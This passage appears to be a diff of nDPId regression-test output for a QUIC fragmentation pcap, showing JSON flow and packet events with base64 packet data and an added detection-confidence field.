VKQVNHXmiaFVKiSaFUFlpUHrBUR8nGg2CAYm5iRBq\/qCatZ+wKK6Jor9Aelj+kTAnp5y3Y17HPQCp3A9e7GN\/AQvzanaLBchENACUbp6PsLPG0WwONlg5LquPMp39gYOflC9I0cMA9lanerY2UKd2DIvHrNxINIhafo64dTHQ2kruV+pvFVizjiYGEPTHm5vnjJ+vNgtO8FZ6Eymo8qJM5A2+vwe1kvg4nJxdm2E2Wn9X7T70nm++uQBCATbDwLy4YWKSHsoUqqJOZluOGYa1wXb4e+XDlmQzD44JyGBZoUrd+\/dh+KC7bZ6++qLMza7R\/lgjP\/l01SyMjsktR9TKWRx8l\/pSrp2aBkNYKphapPAf6rVSB6qqzYptEM4+9RgL5fiahM9zZLohrgrmNstzopEBbSjJHKT2BtkCePCTq9BXTY9wpytpKjLROzmBJcxKjOlKnF1g\/rktfgoVBF1SKnq6hR2PLzX3pKRc\/RptOGJ8gayhpr53uiIJElSTx+gWcAQGtbS9w40dA7UdV0kQrKTsOlEZPv4Wf1DZo6smp3gIVuDDknJHBV+79Kgv5HRfK28giV9WHGfmEktaajImtic0wa4l7nZNKYEOG\/CyBNl4UHMG4iNm+Y40wSoxegD3OA3LFE2Tr3WxLZaukNoA74zUcX2aqS0oIhr43+nrWk7rEOCNY9O2hGcdnBoVGgvgYX\/gYhzcOFnVXvBYg+04X1\/Lu6Je6ysBSIVyex9isvdPzkU7pOxMaiH3uzhIu6T+pp2pHExh+9q+rK10SAGliPxRu5zXtXE3Oy94SyfUjETd0qOQfmkHBz\/e9FYgFyyAkQn3MHd3fMmxpKxNsGPMBp\/cSG\/LANkIApGSvPXTwNw1vUedAoCnyCDwQXlWFtAwyohCNg2btp5ZVrwJqBGM7vTCz+QiD2xs1qEthiBEr8j6ftBwGUP9P0OZX\/LFSLwiLgDLEHK\/768YbCSvzW3RfUSDD4sBnSpdyK4zahGcrI93nPJV2g2l0hHyyPgJ7X+z4BRD+aEuHW6lUHeG3Oj5Qh+Vsi8uKdlG0jwjTzMAg3f97PU4FGrQ+RjmPIPZIj9zzw+nTMrJSpqyIKsK7h2bGHuUUNWEUnH05Zth20+XAUcAWRC4suUp9EI8SZymgXxcd3IQ5KrKIi3GAnhHbFpy9beC1dCN5olmWNLOL3oSxQHzr7fvKwFtpOssY7Sag281T8O6Eak"}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1621490938810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490938810,"pkt":"AAAAAAAAAAQAxdZsCABFAAViDnRAAH4RTyU0uxSvdlnaLuMLAbsFThUFyP8AAB0Is32f4l9Pl3YAAEU0YOqdYTCCZZmk+g3+J22oWfx0doVS585v5dZuMcju6ceFUGjlxObU5iFwgva6ib0ak1Tmez5R8snBJP694+WPYbwvpl7HFaYBb32L02hySVgOT1FTMmvBo2Fo\/d5ANfZGxJNDQBrucO2wU26mhDDIiJWiWYLyLw+2wH9XtUY9hKwoMo3iFTjxOO1dnynX63OlfxLKWOPNDL\/CJlgdgaNXHQV7leuc3Xd6jzLAetIP1cBEVuqCfGK1Z\/PwWhV\/ilCFb3DMmIz+HaenysHXzEImv5aEb6mec8YzM\/GvxDGp1tCbktIjpAUlEhPRXGKZ8L0YQpyXKVC37At+Ncsh7AGMJvk0puDbiFW8meTwbKSAn\/sAaruKCEiN7ZpDtZ6AQjgTjJIChfbGSU8bd6+hfwBxOU5JZ5xFfQWmRvrx7dy8X8kvYMhYuvkFi3w9Ni2RFiXvTVu8VuiANv809cCo09xvlNkdw1DO\/WJmXRsdf1Y0IqaxV5KrebivhDDNQHtyrnyfrxQ5Y4ift5qmodWeoxdiidD7RJxvcyaRuheSGzXqxC4lIAiMQlrcqXvPnq3wegxcfrIRDEWEavybtNijaDhbp2eu65kvOP5wXZMNleDGBSxQdgktQpxL6TcHQlqLOjfCNHdixljqRof7DPO+5RBSaRguaP\/xe1GoZxspva5ZE9Xk+Xf3SmMHKKlPy59QkuWoIaGOiB7N7I1DAInixS\/jVOIySTOq4xF2KnvU1cEtEoyV42Mhr2KORjN9TpQKBy7JF6wcPKs2Pl3baeiEyYmSdleQIgMxFgrcHJCi21HOjSroXF4HIUsE2apsLaSuZKIs6JTyYJ6qUdjIGm424\/UHHh7fS4g4qA\/yUxx\/xBalncHIA4CjURBqXagq47c2XNGvnlFEquS6V7HZy9x27CFukTSbeIjgcRxXOAJzUlJ1yQ5t5JkOgB8oPDo7vO1NPT7iXgezGOshBG3qxRqw4FUz7pY+auLAGyFbA\/lsmtbgOLGTcFptcsDFuxveiIqXNb3fggSAG9Jq3G4TYmnIqNqka7HhL+stsx9khyR4A9gCtftmEfOrTTxMftEStlT5QLserQlCNp0N1XklnoOsNOcDxQty6hF3nIOhScEBVKysqeVEbi4UdZcUA64KdSVhoAaFJgUYzqosBYVtSdq6oVjC3rbAJ92pfW7W5fHOO\/Gzz4rjoa6QO0jRV4cCPZLQqvL7Whl8UxlUFbNLzMyEaywNzMDAb8u4rh5j\/o9WJorChNDzH+7aC1pGc2DBqQhx+NA2UfbkgudimG0uOmYNVjS1IS1bDSwBdSH7GNbNFSEkwovorAkgGXCiJsNN1cNIzzCohUj5lfbIM4g5Mr+pCB40oATdPIus6Jzb2ASLd\/9Q3sKnYlXjoEthW4ZxmNASLbj3i11YfRdbW\/XSJmbOzbWEbGkTfP\/k6k8tNozfErQYaqQcQWy1XNJfDiRBXvvfoE3+y9U2kVEyp3L6AC1g\/JNMxiXgENUxOjpl9VPREmrP\/Rjthtz9gSXutw7+EZR3faEchxgczJKIbKwYHcJXGoSYCA8W3Hk3Zf+L+BJmdrRVHbtPRFqDPup8RvGlcW5Xzoa4vRRZbXHIKNQitatbh6+9\/gMI9RgLPzmaVU\/Vp8RntOXhKOwTec+\/5p5Qci1058hGbPEcEz9RH7ho4Uxp4mI0kI9Cy+wNwmwipQYYPfi742YDYxomWF7pzIij4vCMpGVsjxYg5gSAF5wb8qbS5fVF7UlGZOWJLoEHBgMVPUjuR95n2f0L"}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490938810,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490938810,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1621490940042,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490940042,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEwhAAH4RoqY0uxSvedF+ofgTAbsFTmycyf8AAB0IX1A3NmSMbKUAAEU0Pg8s+OhkXllUqtMD1WTcO9yjUOzCG24snxvIngH7iX6ehFgoF1UYrfDy88XdHomQKlyLms0u9jlYkrqEodLauJRGapy4Hle2I8WKWHQL1rTKZH+tzK8ow8MeqFRrpbk8\/iokxoMoLXgVKCOwqLL7oRfGteGHJcbAGqvj5rPWn8lTHy\/nr7UNzD5DIeg4hTPlFVFboFc96\/ePrxRP6\/CWV2PQluHrHP+UDiuvF+\/WgxAU4Zaq\/s2euO20g4VMq4g6z0hkNtHxIuQ6G6ZlVXeT6uBX6ZPVEg0pfUhEvbGjqyM68S7s\/LuqkjtoK8zch\/4QBOjnMBjjSQwLMYWrIngHxIgbqBSyCkOJ+S+nMOeH0cA+0cnqBY4O49ufQhXDRjEGH5t5soDhhzS8sBGOiS03hbrWi+tm95qnkQ4EY7uhdczTXrlpbhNUdpcyH4wC71tfxfvQVS5y8IC1e8zT5BsHNYmBSU3cCiepaiVmZYJcGPmbBd0EWBl43HnBPIQ8CwCcoTjwgg26Yu4ozcj0BKQFUR0GMUF83l1lF8ot6wXFAA+oVj8seMzHzv2II23OXhbg44qPmITHSEYOmk8bA8y9XUBg7ALjZ36C005quDVZGN0J+Q44oR4tlRYPB94GZr5laHx3xI4zV2UfRy01CNaSkDMoeOEOMaeAi4kFgFipvCE1jwRUNvw9Vqe2+hR\/wsE+qJ\/zc31inDfEFutt+QNKxDy+c5v2szwudCf+3lADM5GAPJCWo+Nv3ArVcoU95DnZ8Qni4gFNPIas7CUUE3oqubppTtj9Kw2C\/6AvXyw4q7FUZBaXB5X4zjUqQWxcc20sJRmNfK46tma+3YZBWJZSVhtM4pRqEfs362IPwcZpvzz9KMT1frJPvZSyqCg5WxsuShHYKbtQca6juA82VMIw7n0mkTmMIQQq9Mj1AYJMVxWSFfEi9dTleToj9MJ1kk9djU0M9qoCSBeOLKZOaO7ZMQoI+LQb5AKLobDEPmCM\/+7vqosV0xxNb5\/8d22vjMPjhhUJQCLCU0zSX2v8r8IeoTWvGuTd36jZKvjkA9tWHYu73L8Z1+CH8Cei7yWoKXUBW3fDckkX+B50D9QGMtC\/RL4c6YIkI006jUdtSCby+AjkkzqsejzwjNaUTji4RgY8P93\/urJ7QidOPx7hxI6\/TCZFHC3NSWXM8bWJhPqBFEUJXD3S1Xr4e\/XJX4lmJ\/Ol5PgUeFwl29wp8pAoUmC4cRILuSnQY4l9xAdZlPqyDmbVu\/SSWy2Akqi5xJqxDVEON1HIuVfAYg1i119Yr7dWU5QplKsuqzsu4hfLJ6M8Yw5ZRJVC7RSE3r\/N0XrnFY73pQjDIXk9UmcxBojTmmq+gMcamIBeoL0S0ukwFhIcT6HHQfqlw0OzdXB1KL44BXZ9G2XIbRiRgnhcLeXH05qnfpT5pUwkVHt9m7ibHbmqRFCjXSOFgriLQZGqyYKgC+7F70lj6Mklvy+ynXaGzESE6icJU\/STfU04WOE\/XjvOrRE8MvWUxGzhOBNeg4DukKHrJE7SlhswBlqxEdAUp1sFZsl\/6UVWCheylk3qxVcmo08I0V6U82TPQllNBHQQvLwa1Hz1qkNj0H98MIqjYsZiUPrT9PHl\/EubC5Mxf+rACdfBZZVOf7ZrGTAkVMqdQkNJ4KAoV4KyVWs727STfm\/XXQbuh+KdV53N3ZDf84eN9hHsz6Xg77mwy7PCShrWSrFEAyXWlin+he1NMoCnvMEs3ErNthA178U9LrQNGhrOQxjMONlj"}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00701{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1621490940362,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490940362,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEyFAAH4Roo00uxSvedF+ofgTAbsFTnxFzf8AAB0IX1A3NmSMbKUAAEU0xxudDjtwfHlFBOkIITOn8rvZxFm\/C93HCINJPVtiKR6bg4Mw7wQEXtiGHvHKsHQBCttPbgS\/hcDSxPOzux0V4CNQepSq2ytOhstQPNFgKqDi1D66h\/pG7BpGzCKPVnSY0j4mZfGHvp\/\/90uSi9bw7p+VzILVU3jM1Bfy+bJs20rNuK7sUwNxouBiolA43ulRiKtOrcMFSJUwryaJPuIF2AKADyLpYU6k7IhYp5pMSN\/FZrzaNP++MuPxUL0Gl5Navc20GBsGENjWTKPgIBn9sYhebGFEzStHKW0oRdWu4ecBWDSRteLnjvyRNfq+mu5PY+bv2BFXCrGw35UfLh\/YXxBUAy4mIdjLfzCt9VY3jAczlR6NzkXFtYCr4R8X++5lLCWyho9eGTf\/ZCpvdhXIm3YwXRQvz+kfxqnQsXH0ATnpdvEsAGru0CyioUbYBPhrlPL198KH2whWhbXpqJHFAyYFbpGDtS75d+ky3I7XtWANXuJ7DarmS3NZjP4Jf66vvGqKiJgy0KfGW+e7woGpFYzAoh4imK1VH8lIlaAurjJK0bKeBg9p5lFL0\/l+10ncgvPXDUuHlo46gy\/05jQ7pY9sWVusH8IwAbUs7+8XHTFa2n0Sk2BBs7cZpvTnwshZ+DP3ur5kokHk4A+vp7WHa4BbCLu22NtXJTp\/gQCajhA7U5McVzIVwwCkYzni+CTklGJudESK0dNwGzMjjvyh74BS8FP9wJoxjQxNp+QpBlr56o5vBkDintusd350CRIWzdRHfSgPIvr94nWDpXZFHV\/kTCtKuqDDbRIFJXgtJbMsMFk99XMXvWAVlDdMLwUFBCiheR0jEKmnOUGFAhtpeRaDYUitm6kQwBSlx494dMG4z7plhkyjgTRLdgMjGfgIdWdBxvKHIIvG3w\/V0evuN7rNPmv9HuOEitJrzJxpVhNZOoxAwLj9Luz46NCnQhKxi8RkJzyxHrjJop3lPAM0Y0bEhkOzTIRWf+t2hC8aA4KzaeLaWoCMRho1h3u3XPu3\/l6coc7iHJv\/2jzHV2f+8iGD+OQNMR9Kk99olUGh3yP6NJUA\/\/JOUUSZU3oe\/+nZqHPjXlf6UZ981hgrw2hFoCczDQltVQw8FOKd26NbN1UtWgiNS2G8T40NYIim1zBCFfKP9QB7fmPzHJDrqF9B2z8JCy2E76upD5NGPW077sVIvba7Ipr6QIRTGvvbV1\/tkhYCjTPxCUUENkB4qeC3g47G4DoEvoxNPUmX4lTntBxzxCUTgRTwb\/lKdC+a0EYxdtM5lRPHqXOg2W4+zkbzAvD981aa8cd3CUfbaiE3dmvVl8kAJBTvA7OBTRbFUiyh4hawpJaNoqqurTOZisggyEq8HET4+QxdAtFezeONkxyuzFSApfMDq9flcgmEnkCr0TO0tqKJC1OKWpkWpLnBiM8yAGqKTKylOg54gnFHgxTuPO66xLEKA8U9uUArvEv53MiMkmwlGJ\/R8DVYSi9lDGyVmqVbcb97csNgpSyaEAeipp\/xWQ9HZtumpN8oEgvCYnLsS2EfcfhO913KD0CEGNt5Eo4gSfP81+PQSvJvVrMAn8EG7DLqd7Bmv5BkyGG2JK8jhFljvgxwM6xjiPRsTShXGKbUG8XLhVXExbTQLftOfAo1ewb7oxiEPU8I+f46C5Ac4FzkNqV4H\/gd0P38BHG7LPoUUiE\/Ipgayi0qMMiXrV6TBl+UJmFlsYoY5\/mLRewMoSEzw4RRXooYehfNFw04DLhOfVWgmuS8w2oNaA6WV0z9"}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1621490941568,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490941568,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEyJAAH4Roow0uxSvedF+ofgTAbsFTkMYwP8AAB0IX1A3NmSMbKUAAEU0X3GLCKhQ\/kdXKlH1Uuvr7DsXc9kc2k0vey+LpKewCV3nDMgYTsbLcy\/hcOGbXOScP++l31aUJmaaSW7D3\/b1UKqaibOt1++jBKUGgHxvkHK7\/eIbPnk5lrlJGltbH1lVtjul90tjvoP2C0HGMu\/Q554\/zF5y3+m7JmZAmSjKD68m0IKoWfIlmy5OvxUjvqVj7fVNTGy8V9A8hysK+PthsdG2XbAGQ5r7jFZtgM2W0MUKS7M8fkDlpw6kLICW6or165\/Pu6sFJ\/29IWOcJLgCsF33hp\/eqp6x6\/ECLl+bLOD\/2ybV1zgfWcQJdeCTDlaBbs00YQsEWV3eNTSP1cAPrcHphduw9dFEMzdLujKMYP6qp9q4Kf9aga2dK4puh5Ip7GziQj98etOy\/ltXPqQDK0X0xvEFsMV40JSwj+BzoIGv4jugTdJl63HCP9wqVdO7OrAmKEFYkbeXK5P6pG8yzHXXppocSBsWVO97R55m5tJhwqTeKsPTGfmgkv+0mr+yMvQABbK3kL73O0HwPVgRMzkj11Hwldi1m3kxEtoBJnbHsAJyW4T4WEMuyY9xWOFILOzlsEWcW1DlkhujMuBrKf4HHbPFIfZA+vCGqVGuA9J49rsNTvkxJ3jjtUuvX02pDhaSBY2OTXYv5Dc54DTTkDjg2S7sEfptoW0pUxSNkWGCbPIP4xa+v0s6S\/mMMDwXP8kgPvEmHUDknP7JkED8bkUIL1Ho0AWHqdjSnc7aUc0tHV706qMXs0VyhEhojglXbeJLnekqAVF1dAyJGsOPr5QTKqiKuC+Sgj3UNOQ2AORLL3k0ntqV2x\/rHRdWLiJtPYEUBcvzUxECD7Dtnifc2AbiFM\/4baOlJluyckkIkfljDBVEu84m1Q2kmQPBLAgkcl7yWChrQ5E\/F60If6SMyqrUlc2HMVvUBPZOd0Nsx8em3OcZz\/rd4dy5sR9B9SAkyfXIjPZat\/3SaduQsvQmjAvUkWJFmJcvwpcq2CHg3vveXbVE0PWJwxm31KUkGpdZBf0LnhThU3dnOeKxoMeUP496G60PKVdq7+Ev8OZxM4csxN6N9XOao2AmHwp\/0PfV0b+M6mCVlON4ySjH0zfT5CuS19JLsB0PAKCSWv6u5RSSSFK4\/9Pykim8KK8CSmoO+ZYYUWS5WpEmMsvK64DpcO9Wo88i\/G337OpXfoBIGbBcKqVJnkKYXTEBvx\/pOckc6mKqj1Xx2NLH9flt3AVKGz33q9V7vvj+2mpU\/AF2AYOC5QHoVhyHo4\/LUMEXlMibQL7QWDMM7oSFG9qo4z3Ogx0Id6yuIs2TTa0ezZqML11NC1X5955fIUW\/FDJcjZV8HB175+M7QL6IEWOOx6PZp1K\/RJlnO3heZacJYqauQwksZQsk4arIv6tCsj5ldWRpoqj3CLHPSNLlUOifs4ET+tW4OnRsMipebDJLpPBCJQJ+ecUpHtHbH+75\/d\/mWMiDQ\/hwUplHzhAjVMYLJSbAhbvEaR1IT2meCVIPAWn6ZyjG6gExtCbx+iUePUXL2hlrgzvBZ3GRHAOacsg6dN+CWQxwhWJB23q+MgzegfFEv2iEzXU8DkMvw\/RCwWjBr20X1FCOk795+lTgR3zGd9CF5postNEBPhGGGNxdqFYsot1FrVpwc5OqokbxkxTF7Onnq2kbbsl8Ba3XWkoGN76uWqzAZmzJNMK92Tdqpu1zazult+08ooXIuTRa2BfjyhJzhXLCrMQgn4QLV75o\/ppwW4gZ0PFwpLXpwmShzQ7nN6WnZ1Py"}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1621490996100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490996100,"pkt":"AAAAAAAAAAQAXWCjCABFAAViEIJAAH4Rpj00uxSvbKuKtt7qAbsFTlULzP8AAB0I1Car3PgqXoAAAEU0JJ9ZSJFnukw1kpIlerEIR7j54itrs6xKCGRE3XXR1FUvYtWiluVKkauej0mCgbfT49PWNVhv+d4PorlbwaCUuVogcoTaWUYfSMeQ7fvaCU5aGPhJnEWG\/0UBi1+8bCzq+SnypfTFmorq2dCk0qu92Ra50orfefmV0vtWsPEJimLpBfooWqbaEDaehfit7mw9dCNYCi1aruacDnpniKy5C0xID610oz+9TzXqtP6hBX3weUiK8Pyj6SMCZYEMLlvyFqwJB6JhFabZjNVmEjxtmGfFjrlmd8rGHWmhPpNKZDxUqmt5inD\/KBSwcSZjjZ2qVnYKFg9ZmE7YiJQNgNHdWnN0hvXaAF9t6UZJG6j5RLXjrewkAvkQDQHDpjvn0e4OB74XmU0f2pIRunZhG7nOdLrUIM3KYu4dp2SuvtBfXKF0JXJe4B3ipp\/HIXGxiIvxOuBhCV+try+l4\/ghPvYz4guxmwVL2sb1KOMYvw3AS2A9R7ISPdwCMEfNl0w7rnx7vKocBLncvhtDj6UswuytUe86VosZs6KpSu0MAgLJQtzS5mHMtRoQC8nFUX3y9GJ3tQdZReoRs5tT1J5QMG4ZaagK3Fd\/7M9x+E3FYrzzeGcDRtrRq5MMA4gADKTgaYZ+dKZMGdYo\/zPs253wfmTLUONNUPE7nq2Vqk53VySGDE\/2DUFu7Ouj4RcxQsyWQ5nTu01SZpQVMCdEN9s3guPRJHE1wvBDlg3bcsULX6ndUJQtoKpB8S6SxF27c5F4vK6k7cDGBUHNhgFGBvHbDK3DfXDpjwj7gg2cqNGRjyAQuR9PRICL7cb0AtSLaZUVEEj9LOfinX22qJNw3UF45DmfYo0\/JhJsSVJETL+9+\/IioFEWfh7SIpMVOu2RmSgEttov5swxPhIzuPvG+jIN04ml6r6sKlbwvgpbTGRWXVEqHBIQKz6hKZClZuSzSFKbsX49qdGXDM4XoODhPHLuRT3yh5r1JVnj7WHxhj3H5nD905qtU6bFJNe7n8l+D+uTJC\/IJu+kVyPQUWTIszeHcVgbabOXCOhKEJ2WtzLg7w+iaHi5LKjOT0MhRn4SMjHqY8gT6IdQh2dB8UwKaPz4N4HHltvk\/z2Y4L7mxeZ\/JjfG7JTmXTK6vTdjv9\/CAxmGhA\/wluaZ8tsrr5D+RdZPcXbEgBxH\/1tm6Bm6MpwP4YTSV9nxhIj0pGZHkpR+b2F4vl+nfENUZ5pReO94D4F\/RK66IESDjrP6tunmsMOMwn4+7B6QDDyOPDemTPrdF7zgJ+tY8975Y574Jc\/8yLBjbsC2ChrCxey35qrU\/vbhI34DkY7t8RrGmb3mWvKTS3qkB7Crk6DhnsUeTkGhVfg7A64U7ZiG4gBUQe7bIdSST2ngB6BSxxi3zRFk57obYhZOPoc3fWCo75KIToMVPMEYkIJx9+0YQlJeC5tnUyTEdxLueb2t5tk60+o+zEAOczUzzmu+JgJmBDQC3kS7OhExq2w8nBzzBuSHPPKcrZD8XdVFyl6v9hzq+F47wNZ22K27SHatestnBzU2FJkFSWgVWESWEb2tfRRceR37vbK\/bpqkp0cvwGojwVUlRemGqfylFPMQ1s+cnHj5sWbpZptO22YP\/G+CKfzf8pXSX7kzLdflxLF9DxVV+b83+nl+nTbj31vNDvGjXGswE6k3b\/905Liv2TlF0IzK2ZLVImonTHT6GswLKKIQ31p0M617FD3z1I3\/Kv2TR3RJaw4Ynkj4A5OuDN07n7PbCwGTm8j44Q\/2rqIeqilV"}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490996100,"flow_last_seen":1621490996100,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490996100,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
